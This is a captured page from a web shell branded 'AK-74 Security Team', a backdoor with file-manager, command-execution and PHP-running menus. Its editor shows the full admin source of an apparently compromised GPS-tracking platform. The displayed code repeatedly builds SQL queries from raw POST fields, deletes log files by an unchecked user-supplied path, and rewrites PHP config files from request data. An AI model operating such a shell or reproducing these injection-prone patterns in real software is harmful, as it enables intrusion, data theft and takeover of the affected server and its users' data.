.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<? set_time_limit(0); session_start(); include ('../init.php'); include ('fn_common.php'); include ('fn_cleanup.php'); include ('../tools/sms.php'); if (version_compare(PHP_VERSION, '5.5.0', '>=')) { include ('../tools/email.php'); } else { include ('../tools/email52.php'); } checkUserSession(); checkUserCPanelPrivileges(); loadLanguage($_SESSION["language"], $_SESSION["units"]); if(@$_POST['cmd'] == 'load_server_data') { // get not modified server settings include ('../config.custom.php'); if (file_exists('../config.hosting.php')) { include ('../config.hosting.php'); } if ($gsValues['SERVER_API_KEY'] == '') { $gsValues['SERVER_API_KEY'] = genServerAPIKey(); } if ($gsValues['SMS_GATEWAY_IDENTIFIER'] == '') { $gsValues['SMS_GATEWAY_IDENTIFIER'] = genSMSGatewayIdn($_SESSION["email"]); } // reset email credentials if ($_SESSION["cpanel_privileges"] != 'super_admin') { $gsValues['EMAIL_SMTP_USERNAME'] = ''; $gsValues['EMAIL_SMTP_PASSWORD'] = ''; } $result = array('server_api_key' => $gsValues['SERVER_API_KEY'], 'server_api_ip' => $gsValues['SERVER_API_IP'], 'url_login' => $gsValues['URL_LOGIN'], 'url_help' => $gsValues['URL_HELP'], 'url_contact' => $gsValues['URL_CONTACT'], 'url_shop' => $gsValues['URL_SHOP'], 'url_sms_gateway_app' => $gsValues['URL_SMS_GATEWAY_APP'], 'connection_timeout' => $gsValues['CONNECTION_TIMEOUT'], 'history_period' => $gsValues['HISTORY_PERIOD'], 'db_backup_time' => $gsValues['DB_BACKUP_TIME'], 'db_backup_email' => $gsValues['DB_BACKUP_EMAIL'], 'name' => stripcslashes($gsValues['NAME']), 'generator' => stripcslashes($gsValues['GENERATOR']), 'about' => $gsValues['ABOUT'], 'help_page' => $gsValues['HELP_PAGE'], 'logo' => $gsValues['LOGO'], 'logo_small' => $gsValues['LOGO_SMALL'], 'map_osm' => $gsValues['MAP_OSM'], 'map_bing' => $gsValues['MAP_BING'], 'map_google' => $gsValues['MAP_GOOGLE'], 'map_google_street_view' => $gsValues['MAP_GOOGLE_STREET_VIEW'], 'map_google_traffic' => $gsValues['MAP_GOOGLE_TRAFFIC'], 'map_mapbox' => $gsValues['MAP_MAPBOX'], 'map_arcgis' => $gsValues['MAP_ARCGIS'], 'map_yandex' => $gsValues['MAP_YANDEX'], 'geocoder_service' => $gsValues['GEOCODER_SERVICE'], 'geocoder_cache' => $gsValues['GEOCODER_CACHE'], 'map_bing_key' => $gsValues['MAP_BING_KEY'], 'map_google_key' => $gsValues['MAP_GOOGLE_KEY'], 'map_mapbox_key' => $gsValues['MAP_MAPBOX_KEY'], 'map_arcgis_key' => $gsValues['MAP_ARCGIS_KEY'], 'map_yandex_key' => $gsValues['MAP_YANDEX_KEY'], 'geocoder_bing_key' => $gsValues['GEOCODER_BING_KEY'], 'geocoder_google_key' => $gsValues['GEOCODER_GOOGLE_KEY'], 'geocoder_mapbox_key' => $gsValues['GEOCODER_MAPBOX_KEY'], 'geocoder_pickpoint_key' => $gsValues['GEOCODER_PICKPOINT_KEY'], 'routing_osmr_service_url' => $gsValues['ROUTING_OSMR_SERVICE_URL'], 'map_layer' => $gsValues['MAP_LAYER'], 'map_zoom' => $gsValues['MAP_ZOOM'], 'map_lat' => $gsValues['MAP_LAT'], 'map_lng' => $gsValues['MAP_LNG'], 'address_display_object_data_list' => $gsValues['ADDRESS_DISPLAY_OBJECT_DATA_LIST'], 'address_display_event_data_list' => $gsValues['ADDRESS_DISPLAY_EVENT_DATA_LIST'], 'address_display_history_route_data_list' => $gsValues['ADDRESS_DISPLAY_HISTORY_ROUTE_DATA_LIST'], 'page_after_login' => $gsValues['PAGE_AFTER_LOGIN'], 'show_hide_password' => $gsValues['SHOW_HIDE_PASSWORD'], 'allow_registration' => $gsValues['ALLOW_REGISTRATION'], 'account_expire' => $gsValues['ACCOUNT_EXPIRE'], 'account_expire_period' => $gsValues['ACCOUNT_EXPIRE_PERIOD'], 'user_map_osm' => $gsValues['USER_MAP_OSM'], 'user_map_bing' => $gsValues['USER_MAP_BING'], 'user_map_google' => $gsValues['USER_MAP_GOOGLE'], 'user_map_google_street_view' => $gsValues['USER_MAP_GOOGLE_STREET_VIEW'], 'user_map_google_traffic' => $gsValues['USER_MAP_GOOGLE_TRAFFIC'], 'user_map_mapbox' => $gsValues['USER_MAP_MAPBOX'], 'user_map_arcgis' => $gsValues['USER_MAP_ARCGIS'], 'user_map_yandex' => $gsValues['USER_MAP_YANDEX'], 'language' => $gsValues['LANGUAGE'], 'unit_of_distance' => $gsValues['UNIT_OF_DISTANCE'], 'unit_of_capacity' => $gsValues['UNIT_OF_CAPACITY'], 'unit_of_temperature' => $gsValues['UNIT_OF_TEMPERATURE'], 'currency' => $gsValues['CURRENCY'], 'timezone' => $gsValues['TIMEZONE'], 'dst' => $gsValues['DST'], 'dst_start' => $gsValues['DST_START'], 'dst_end' => $gsValues['DST_END'], 'obj_add' => $gsValues['OBJ_ADD'], 'obj_limit' => $gsValues['OBJ_LIMIT'], 'obj_limit_num' => $gsValues['OBJ_LIMIT_NUM'], 'obj_days' => $gsValues['OBJ_DAYS'], 'obj_days_num' => $gsValues['OBJ_DAYS_NUM'], 'obj_days_trial' => $gsValues['OBJ_DAYS_TRIAL'], 'obj_edit' => $gsValues['OBJ_EDIT'], 'obj_delete' => $gsValues['OBJ_DELETE'], 'obj_history_clear' => $gsValues['OBJ_HISTORY_CLEAR'], 'kml' => $gsValues['KML'], 'dashboard' => $gsValues['DASHBOARD'], 'history' => $gsValues['HISTORY'], 'reports' => $gsValues['REPORTS'], 'tachograph' => $gsValues['TACHOGRAPH'], 'tasks' => $gsValues['TASKS'], 'rilogbook' => $gsValues['RILOGBOOK'], 'dtc' => $gsValues['DTC'], 'maintenance' => $gsValues['MAINTENANCE'], 'expenses' => $gsValues['EXPENSES'], 'object_control' => $gsValues['OBJECT_CONTROL'], 'image_gallery' => $gsValues['IMAGE_GALLERY'], 'chat' => $gsValues['CHAT'], 'subaccounts' => $gsValues['SUBACCOUNTS'], 'sms_gateway_server' => $gsValues['SMS_GATEWAY_SERVER'], 'api' => $gsValues['API'], 'notify_obj_expire' => $gsValues['NOTIFY_OBJ_EXPIRE'], 'notify_obj_expire_period' => $gsValues['NOTIFY_OBJ_EXPIRE_PERIOD'], 'notify_account_expire' => $gsValues['NOTIFY_ACCOUNT_EXPIRE'], 'notify_account_expire_period' => $gsValues['NOTIFY_ACCOUNT_EXPIRE_PERIOD'], 'sim_number' => $gsValues['SIM_NUMBER'], 'reports_schedule' => $gsValues['REPORTS_SCHEDULE'], 'object_control_default_templates' => $gsValues['OBJECT_CONTROL_DEFAULT_TEMPLATES'], 'places_markers' => $gsValues['PLACES_MARKERS'], 'places_routes' => $gsValues['PLACES_ROUTES'], 'places_zones' => $gsValues['PLACES_ZONES'], 'usage_email_daily' => $gsValues['USAGE_EMAIL_DAILY'], 'usage_sms_daily' => $gsValues['USAGE_SMS_DAILY'], 'usage_webhook_daily' => $gsValues['USAGE_WEBHOOK_DAILY'], 'usage_api_daily' => $gsValues['USAGE_API_DAILY'], 'billing' => $gsValues['BILLING'], 'billing_gateway' => $gsValues['BILLING_GATEWAY'], 'billing_currency' => $gsValues['BILLING_CURRENCY'], 'billing_recover_plan' => $gsValues['BILLING_RECOVER_PLAN'], 'billing_paypalv2_account' => $gsValues['BILLING_PAYPALV2_ACCOUNT'], 'billing_paypalv2_client_id' => $gsValues['BILLING_PAYPALV2_CLIENT_ID'], 'billing_paypalv2_custom' => $gsValues['BILLING_PAYPALV2_CUSTOM'], 'billing_paypalv2_ipn_url' => $gsValues['URL_ROOT'].'/api/billing/paypal.php', 'billing_paypal_account' => $gsValues['BILLING_PAYPAL_ACCOUNT'], 'billing_paypal_custom' => $gsValues['BILLING_PAYPAL_CUSTOM'], 'billing_paypal_ipn_url' => $gsValues['URL_ROOT'].'/api/billing/paypal.php', 'billing_custom_url' => $gsValues['BILLING_CUSTOM_URL'], 'email' => $gsValues['EMAIL'], 'email_no_reply' => $gsValues['EMAIL_NO_REPLY'], 'email_signature' => $gsValues['EMAIL_SIGNATURE'], 'email_smtp' => $gsValues['EMAIL_SMTP'], 'email_smtp_host' => $gsValues['EMAIL_SMTP_HOST'], 'email_smtp_port' => $gsValues['EMAIL_SMTP_PORT'], 'email_smtp_auth' => $gsValues['EMAIL_SMTP_AUTH'], 'email_smtp_secure' => $gsValues['EMAIL_SMTP_SECURE'], 'email_smtp_username' => $gsValues['EMAIL_SMTP_USERNAME'], 'email_smtp_password' => $gsValues['EMAIL_SMTP_PASSWORD'], 'sms_gateway' => $gsValues['SMS_GATEWAY'], 'sms_gateway_type' => $gsValues['SMS_GATEWAY_TYPE'], 'sms_gateway_number_filter' => $gsValues['SMS_GATEWAY_NUMBER_FILTER'], 'sms_gateway_url' => $gsValues['SMS_GATEWAY_URL'], 'sms_gateway_identifier' => $gsValues['SMS_GATEWAY_IDENTIFIER'], 'server_cleanup_users_ae' => $gsValues['SERVER_CLEANUP_USERS_AE'], 'server_cleanup_objects_not_activated_ae' => $gsValues['SERVER_CLEANUP_OBJECTS_NOT_ACTIVATED_AE'], 'server_cleanup_objects_not_used_ae' => $gsValues['SERVER_CLEANUP_OBJECTS_NOT_USED_AE'], 'server_cleanup_db_junk_ae' => $gsValues['SERVER_CLEANUP_DB_JUNK_AE'], 'server_cleanup_users_days' => $gsValues['SERVER_CLEANUP_USERS_DAYS'], 'server_cleanup_objects_not_activated_days' => $gsValues['SERVER_CLEANUP_OBJECTS_NOT_ACTIVATED_DAYS'] ); echo json_encode($result); die; } if(@$_POST['cmd'] == 'save_server_data') { if ($_SESSION["cpanel_privileges"] != 'super_admin') { die; } $items = json_decode(stripslashes($_POST['items']),true); $str = ''; foreach ($items as $item => $value) { $item = str_replace("<?", "", $item); $item = str_replace("?>", "", $item); $value = str_replace("<?", "", $value); $value = str_replace("?>", "", $value); $item = addcslashes($item, "'"); $value = addcslashes($value, "'"); $str .= '$gsValues[\''.strtoupper($item).'\'] = \''.$value.'\';'."\r\n"; } $str = "<?\r\n".$str. "?>"; $handle = fopen('../config.custom.php', 'w'); fwrite($handle, $str); fclose($handle); echo 'OK'; die; } if(@$_POST['cmd'] == 'reset_server_api_key') { if ($_SESSION["cpanel_privileges"] != 'super_admin') { die; } $api_key = genServerAPIKey(); $result = array('api_key' => $api_key); echo json_encode($result); die; } if(@$_POST['cmd'] == 'clear_geocoder_cache') { if ($_SESSION["cpanel_privileges"] != 'super_admin') { die; } $q = "DELETE FROM gs_geocoder_cache"; $r = mysqli_query($ms, $q); $q = "ALTER TABLE gs_geocoder_cache AUTO_INCREMENT = 1"; $r = mysqli_query($ms, $q); echo 'OK'; die; } if(@$_POST['cmd'] == 'delete_favicon') { $file = $gsValues['PATH_ROOT'].'favicon.ico'; if(is_file($file)) { @unlink($file); } $file = $gsValues['PATH_ROOT'].'favicon.png'; if(is_file($file)) { @unlink($file); } echo 'OK'; die; } if(@$_POST['cmd'] == 'delete_login_background') { $file = $gsValues['PATH_ROOT'].'img/login-background.jpg'; if(is_file($file)) { @unlink($file); } echo 'OK'; die; } if(@$_POST['cmd'] == 'load_theme_list') { $result = array(); $q = "SELECT * FROM `gs_themes` ORDER BY `name` ASC"; $r = mysqli_query($ms, $q); while($row=mysqli_fetch_array($r)) { $theme_id = $row['theme_id']; $name = $row['name']; $active = $row['active']; $result[] = array('theme_id' => $theme_id, 'name' => $name, 'active' => $active); } echo json_encode($result); die; } if(@$_POST['cmd'] == 'load_theme_default') { $result = array('theme' => getThemeDefault()); echo json_encode($result); die; } if(@$_POST['cmd'] == 'load_theme') { $theme_id = $_POST['theme_id']; $q = "SELECT * FROM `gs_themes` WHERE `theme_id`='".$theme_id."'"; $r = mysqli_query($ms, $q); $row = mysqli_fetch_array($r); $theme = json_decode($row['theme'],true); $theme_default = getThemeDefault(); foreach ($theme_default as $key => $value) { if (!isset($theme[$key])) { $theme[$key] = $value; } } $result = array('name' => $row['name'], 'active' => $row['active'], 'theme' => $theme); echo json_encode($result); die; } if(@$_POST['cmd'] == 'save_theme') { $theme_id= $_POST["theme_id"]; $name = $_POST["name"]; $active = $_POST["active"]; $theme = $_POST["theme"]; if ($active == true) { $q = "UPDATE `gs_themes` SET `active`='false'"; $r = mysqli_query($ms, $q); } if ($theme_id == 'false') { $q = "INSERT INTO `gs_themes` (`name`, `active`, `theme` ) VALUES ( '".$name."', '".$active."', '".$theme."')"; } else { $q = "UPDATE `gs_themes` SET `name`='".$name."', `active`='".$active."', `theme`='".$theme."' WHERE `theme_id`='".$theme_id."'"; } $r = mysqli_query($ms, $q); echo 'OK'; } if(@$_POST['cmd'] == 'delete_all_themes') { $q = "DELETE FROM `gs_themes`"; $r = mysqli_query($ms, $q); echo 'OK'; die; } if(@$_POST['cmd'] == 'delete_theme') { $theme_id = $_POST["theme_id"]; $q = "DELETE FROM `gs_themes` WHERE `theme_id`='".$theme_id."'"; $r = mysqli_query($ms, $q); echo 'OK'; die; } if(@$_POST['cmd'] == 'activate_theme') { $theme_id = $_POST["theme_id"]; $q = "UPDATE `gs_themes` SET `active`='false'"; $r = mysqli_query($ms, $q); $q = "UPDATE `gs_themes` SET `active`='true' WHERE `theme_id`='".$theme_id."'"; $r = mysqli_query($ms, $q); echo 'OK'; die; } if(@$_POST['cmd'] == 'deactivate_theme') { $theme_id = $_POST["theme_id"]; $q = "UPDATE `gs_themes` SET `active`='false' WHERE `theme_id`='".$theme_id."'"; $r = mysqli_query($ms, $q); echo 'OK'; die; } if(@$_POST['cmd'] == 'load_custom_map_list') { $result = array(); $q = "SELECT * FROM `gs_maps` ORDER BY `name` ASC"; $r = mysqli_query($ms, $q); while($row=mysqli_fetch_array($r)) { $map_id = $row['map_id']; $name = $row['name']; $active = $row['active']; $type = strtoupper($row['type']); $url = $row['url']; $layers = $row['layers']; $result[] = array('map_id' => $map_id, 'name' => $name, 'active' => $active, 'type' => $type, 'url' => $url, 'layers' => $layers); } echo json_encode($result); die; } if(@$_POST['cmd'] == 'load_custom_map') { $result = array(); $map_id = $_POST['map_id']; $q = "SELECT * FROM `gs_maps` WHERE `map_id`='".$map_id."'"; $r = mysqli_query($ms, $q); $row = mysqli_fetch_array($r); $result = array('name' => $row['name'], 'active' => $row['active'], 'type' => $row['type'], 'url' => $row['url'], 'layers' => $row['layers']); echo json_encode($result); die; } if(@$_POST['cmd'] == 'save_custom_map') { $map_id = $_POST["map_id"]; $name = $_POST["name"]; $active = $_POST["active"]; $type = $_POST["type"]; $url = $_POST["url"]; $layers = $_POST["layers"]; if ($map_id == 'false') { $q = "INSERT INTO `gs_maps` (`name`, `active`, `type`, `url`, `layers` ) VALUES ( '".$name."', '".$active."', '".$type."', '".$url."', '".$layers."')"; } else { $q = "UPDATE `gs_maps` SET `name`='".$name."', `active`='".$active."', `type`='".$type."', `url`='".$url."', `layers`='".$layers."' WHERE `map_id`='".$map_id."'"; } $r = mysqli_query($ms, $q); echo 'OK'; } if(@$_POST['cmd'] == 'delete_all_custom_maps') { $q = "DELETE FROM `gs_maps`"; $r = mysqli_query($ms, $q); echo 'OK'; die; } if(@$_POST['cmd'] == 'delete_custom_map') { $map_id = $_POST["map_id"]; $q = "DELETE FROM `gs_maps` WHERE `map_id`='".$map_id."'"; $r = mysqli_query($ms, $q); echo 'OK'; die; } if(@$_POST['cmd'] == 'activate_custom_map') { $map_id = $_POST["map_id"]; $q = "UPDATE `gs_maps` SET `active`='true' WHERE `map_id`='".$map_id."'"; $r = mysqli_query($ms, $q); echo 'OK'; die; } if(@$_POST['cmd'] == 'deactivate_custom_map') { $map_id = $_POST["map_id"]; $q = "UPDATE `gs_maps` SET `active`='false' WHERE `map_id`='".$map_id."'"; $r = mysqli_query($ms, $q); echo 'OK'; die; } if(@$_POST['cmd'] == 'load_billing_plan_list') { $result = array(); $q = "SELECT * FROM `gs_billing_plans` ORDER BY `name` ASC"; $r = mysqli_query($ms, $q); while($row=mysqli_fetch_array($r)) { $plan_id = $row['plan_id']; $name = $row['name']; $active = $row['active']; $objects = $row['objects']; $period = $row['period']; $period_type = $row['period_type']; $price = $row['price']; $price .= ' '.$gsValues['BILLING_CURRENCY']; $result[] = array('plan_id' => $plan_id, 'name' => $name, 'active' => $active, 'objects' => $objects, 'period' => $period, 'period_type' => $period_type, 'price' => $price); } echo json_encode($result); die; } if(@$_POST['cmd'] == 'load_billing_plan') { $result = array(); $plan_id = $_POST['plan_id']; $q = "SELECT * FROM `gs_billing_plans` WHERE `plan_id`='".$plan_id."'"; $r = mysqli_query($ms, $q); $row = mysqli_fetch_array($r); $result = array('plan_id' => $row['plan_id'], 'name' => $row['name'], 'active' => $row['active'], 'objects' => $row['objects'], 'period' => $row['period'], 'period_type' => $row['period_type'], 'price' => $row['price']); echo json_encode($result); die; } if(@$_POST['cmd'] == 'save_billing_plan') { $plan_id = $_POST["plan_id"]; $name = $_POST["name"]; $active = $_POST["active"]; $objects = $_POST["objects"]; $period = $_POST["period"]; $period_type = $_POST["period_type"]; $price = $_POST["price"]; if ($plan_id == 'false') { $q = "INSERT INTO `gs_billing_plans` (`name`, `active`, `objects`, `period`, `period_type`, `price` ) VALUES ( '".$name."', '".$active."', '".$objects."', '".$period."', '".$period_type."', '".$price."')"; } else { $q = "UPDATE `gs_billing_plans` SET `name`='".$name."', `active`='".$active."', `objects`='".$objects."', `period`='".$period."', `period_type`='".$period_type."', `price`='".$price."' WHERE `plan_id`='".$plan_id."'"; } $r = mysqli_query($ms, $q); echo 'OK'; die; } if(@$_POST['cmd'] == 'delete_all_billing_plans') { $q = "DELETE FROM `gs_billing_plans`"; $r = mysqli_query($ms, $q); echo 'OK'; die; } if(@$_POST['cmd'] == 'delete_billing_plan') { $plan_id = $_POST["plan_id"]; $q = "DELETE FROM `gs_billing_plans` WHERE `plan_id`='".$plan_id."'"; $r = mysqli_query($ms, $q); echo 'OK'; die; } if(@$_POST['cmd'] == 'activate_billing_plan') { $plan_id = $_POST["plan_id"]; $q = "UPDATE `gs_billing_plans` SET `active`='true' WHERE `plan_id`='".$plan_id."'"; $r = mysqli_query($ms, $q); echo 'OK'; die; } if(@$_POST['cmd'] == 'deactivate_billing_plan') { $plan_id = $_POST["plan_id"]; $q = "UPDATE `gs_billing_plans` SET `active`='false' WHERE `plan_id`='".$plan_id."'"; $r = mysqli_query($ms, $q); echo 'OK'; die; } if(@$_POST['cmd'] == 'load_language_list') { $result = array(); $q = "SELECT * FROM `gs_system` WHERE `key`='LANGUAGES'"; $r = mysqli_query($ms, $q); $row = mysqli_fetch_array($r); $languages = explode(",", $row['value']); $path = $gsValues['PATH_ROOT'].'lng'; $dh = opendir($path); while (($file = readdir($dh)) !== false) { if ($file != '.' && $file != '..' && $file != 'Thumbs.db') { $folder_path = $path.'/'.$file; if (is_dir($folder_path)) { if (file_exists($folder_path.'/lng_main.php')) { $lng = strtolower($file); if ($lng != 'english') { if (in_array($lng, $languages)) { $result[] = array('lng' => $lng, 'active' => true); } else { $result[] = array('lng' => $lng, 'active' => false); } } } } } } closedir($dh); //$result[] = array('lng' => 'english', 'active' => true); sort($result); echo json_encode($result); die; } if(@$_POST['cmd'] == 'load_language') { $languages = array(); $la = array(); $lng = $_POST['lng']; include ($gsValues['PATH_ROOT'].'lng/english/lng_main.php'); $languages['english'] = $la; $la = array(); if ($lng != '') { if (!isFilePathValid($lng)) { die; } if (!ctype_alpha($lng)) { die; } // load another language if ($lng != 'english') { $lng_path = $gsValues['PATH_ROOT'].'lng/'.$lng.'/lng_main.php'; if (file_exists($lng_path)) { include($lng_path); $languages[$lng] = $la; } } } echo json_encode($languages); die; } if(@$_POST['cmd'] == 'save_language') { $lng = $_POST['lng']; if (!isFilePathValid($lng)) { die; } $items = json_decode(stripslashes($_POST['items']),true); $str = ''; $path = $gsValues['PATH_ROOT'].'lng/'.$lng.'/lng_main.php'; foreach ($items as $item => $value) { if ($value != '') { $item = str_replace("<?", "", $item); $item = str_replace("?>", "", $item); $value = str_replace("<?", "", $value); $value = str_replace("?>", "", $value); $item = addcslashes($item, "'"); $value = addcslashes($value, "'"); $str .= '$la[\''.$item.'\'] = \''.$value.'\';'."\r\n"; } } $str = "<?\r\n".$str."?>\r\n"; $handle = fopen($path, 'w'); fwrite($handle, $str); fclose($handle); echo 'OK'; die; } if(@$_POST['cmd'] == 'activate_language') { $lng = $_POST['lng']; $q = "SELECT * FROM `gs_system` WHERE `key`='LANGUAGES'"; $r = mysqli_query($ms, $q); $row = mysqli_fetch_array($r); $languages = explode(",", $row['value']); if (!in_array($lng, $languages)) { $languages[] = $lng; sort($languages); $languages_str = implode(',', $languages); $q = "SELECT * FROM `gs_system` WHERE `key`='LANGUAGES'"; $r = mysqli_query($ms, $q); $row = mysqli_fetch_array($r); if ($row) { $q = "UPDATE gs_system SET `value`='".$languages_str."' WHERE `key`='LANGUAGES'"; $r = mysqli_query($ms, $q); } else { $q = "INSERT INTO `gs_system`(`key`,`value`) VALUES ('LANGUAGES', '".$languages_str."')"; $r = mysqli_query($ms, $q); } } echo 'OK'; die; } if(@$_POST['cmd'] == 'deactivate_language') { $lng = $_POST['lng']; $q = "SELECT * FROM `gs_system` WHERE `key`='LANGUAGES'"; $r = mysqli_query($ms, $q); $row = mysqli_fetch_array($r); $languages = explode(",", $row['value']); if (in_array($lng, $languages)) { foreach ($languages as $key => $value){ if ($value == $lng) { unset($languages[$key]); } } $languages_str = implode(',', $languages); $q = "SELECT * FROM `gs_system` WHERE `key`='LANGUAGES'"; $r = mysqli_query($ms, $q); $row = mysqli_fetch_array($r); if ($row) { $q = "UPDATE gs_system SET `value`='".$languages_str."' WHERE `key`='LANGUAGES'"; $r = mysqli_query($ms, $q); } else { $q = "INSERT INTO `gs_system`(`key`,`value`) VALUES ('LANGUAGES', '".$languages_str."')"; $r = mysqli_query($ms, $q); } } echo 'OK'; die; } if(@$_POST['cmd'] == 'load_template_list') { $result = array(); $q = "SELECT * FROM `gs_templates` WHERE `language`='english' ORDER BY `name` ASC"; $r = mysqli_query($ms, $q); while($row=mysqli_fetch_array($r)) { $result[] = $row['name']; } echo json_encode($result); die; } if(@$_POST['cmd'] == 'load_template') { $result = array(); $name = $_POST['name']; $language = $_POST['language']; $q = "SELECT * FROM `gs_templates` WHERE `name`='".$name."' AND `language`='".$language."'"; $r = mysqli_query($ms, $q); $row = mysqli_fetch_array($r); if (!$row) { $q = "SELECT * FROM `gs_templates` WHERE `name`='".$name."' AND `language`='english'"; $r = mysqli_query($ms, $q); $row = mysqli_fetch_array($r); } $result = array('name' => $row['name'], 'subject' => $row['subject'], 'message' => $row['message']); echo json_encode($result); die; } if(@$_POST['cmd'] == 'save_template') { $name = $_POST['name']; $language = $_POST['language']; $subject = $_POST['subject']; $message = $_POST['message']; $q = "SELECT * FROM `gs_templates` WHERE `name`='".$name."' AND `language`='".$language."'"; $r = mysqli_query($ms, $q); $row = mysqli_fetch_array($r); if ($row) { $q = "UPDATE gs_templates SET `subject`='".$subject."', `message`='".$message."' WHERE `name`='".$name."' AND `language`='".$language."'"; $r = mysqli_query($ms, $q); } else { $q = "INSERT INTO `gs_templates` (`name`, `language`, `subject`, `message`) VALUES ( '".$name."', '".$language."', '".$subject."', '".$message."')"; $r = mysqli_query($ms, $q); } echo 'OK'; die; } if(@$_POST['cmd'] == 'clear_sms_queue') { clearSMSAPPQueue($gsValues['SMS_GATEWAY_IDENTIFIER']); echo 'OK'; die; } if(@$_POST['cmd'] == 'server_cleanup_users') { $days = $_POST['days']; $result = serverCleanupUsers($days); echo $result; die; } if(@$_POST['cmd'] == 'server_cleanup_objects_not_activated') { $days = $_POST['days']; $result = serverCleanupObjectsNotActivated($days); echo $result; die; } if(@$_POST['cmd'] == 'server_cleanup_objects_not_used') { $result = serverCleanupObjectsNotUsed(); echo $result; die; } if(@$_POST['cmd'] == 'server_cleanup_db_junk') { $result = serverCleanupDbJunk(); echo $result; die; } if(@$_POST['cmd'] == 'load_log_list') { $result = array(); $dir = $gsValues['PATH_ROOT'].'/logs'; $dh = opendir($dir); while (($file = readdir($dh)) !== false) { if ($file != '.' && $file != '..' && $file != 'Thumbs.db') { $modified = convUserTimezone(gmdate("Y-m-d H:i:s", filemtime($dir.'/'.$file))); $size = filesize($dir.'/'.$file); $size = number_format($size / 1048576, 3); $result[] = array('name' => $file, 'modified' => $modified, 'size' => $size); } } closedir($dh); echo json_encode($result); die; } if(@$_POST['cmd'] == 'delete_all_logs') { $path = $gsValues['PATH_ROOT'].'logs/'; $files = glob($path."*.log"); if (is_array($files)) { foreach($files as $file) { if(is_file($file)) { @unlink($file); } } } echo 'OK'; die; } if(@$_POST['cmd'] == 'delete_log') { $file = $_POST['file']; $file = $gsValues['PATH_ROOT'].'logs/'.$file; if(is_file($file)) { @unlink($file); } echo 'OK'; die; } ?>
Rename:
-